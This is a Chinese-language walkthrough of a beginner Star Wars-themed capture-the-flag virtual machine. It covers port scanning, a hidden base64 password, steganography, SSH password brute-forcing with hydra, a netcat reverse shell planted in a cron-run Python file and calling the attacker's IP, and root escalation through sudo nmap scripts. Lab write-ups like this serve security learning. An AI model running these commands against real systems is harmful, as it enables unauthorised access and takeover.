题目描述
Star Wars themed CTF for beginners
This works better with VirtualBox rather than VMware
环境下载
- 戳此进行环境下载
NULLY CYBERSECURITY: 1靶机搭建
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
- 目标靶机的 IP 地址为:
192.168.56.111- 攻击机的 IP 地址为:
192.168.56.102
渗透测试
信息搜集
用 Nmap 扫描一下目标靶机的端口信息:
sudo nmap -sS -A -Pn 192.168.56.111,发现开放了22、80两个端口
用 dirb 扫描一下 80 端口 web 目录:
dirb http://192.168.56.111
漏洞挖掘
- 访问
http://192.168.56.111/robots.txt,提示
Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG.
- 根据提示访问
http://192.168.56.111/r2d2
- 查看
http://192.168.56.111/index.html源代码,发现注释中有串 base64 字符串注明是密码,解密后出现了滑稽的一幕,先记录一下等会试试有没有用
- 注意到前面的页面中存在两张照片,访问
http://192.168.56.111/images/,正好是这两张照片,下载下来分析时发现 png 图片有异常的数据,用zsteg查看一下发现真正的密码:babyYoda123
- 但是不知道用户名是啥,继续用
dirb探测一下dirb http://192.268.56.111 -X .php,.js,.txt,发现存在http://192.168.56.111/users.js,访问得到两个用户名skywalker、han
getshell
- 由于开放了 22 端口,用得到的用户名和密码组合尝试登录 ssh,发现
skywalker:han可以组合成功
提权
- 查看文件发现
han家目录下有一个文件夹.secrets,内有一个note.txt,查看内容
- 根据
note.txt的内容,利用cewl对http://192.168.56.111/r2d2进行信息收集制作密码集
cewl http://192.168.56.111/r2d2 > pass.txt
- 继续用 hydra 爆破
skywalker的密码,得到密码:tatooine
hydra -l skywalker -P pass.txt -f -V 192.168.56.111 ssh
- 切换用户到
skywalker,继续重复前面的操作,发现内容
- 查看用户
Darth家目录下的内容,同样发现家目录下有一个文件夹.secrets,内有一个eval.py,其是一个可读写的可执行 python 文件,这个文件在一分钟后执行,我们修改其内容为
import os
os.system("nc -e /bin/bash 192.168.56.102 1234")
- 起个 nc,等待片刻,成功接收到反弹的 shell,先将 shell 转变成交互式的 shell
SHELL=/bin/bash script -q /dev/null
- 执行
sudo -l查看,发现可以通过/usr/bin/nmap来提权,成功拿到 root 权限
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo /usr/bin/nmap --script=/tmp/root.nse
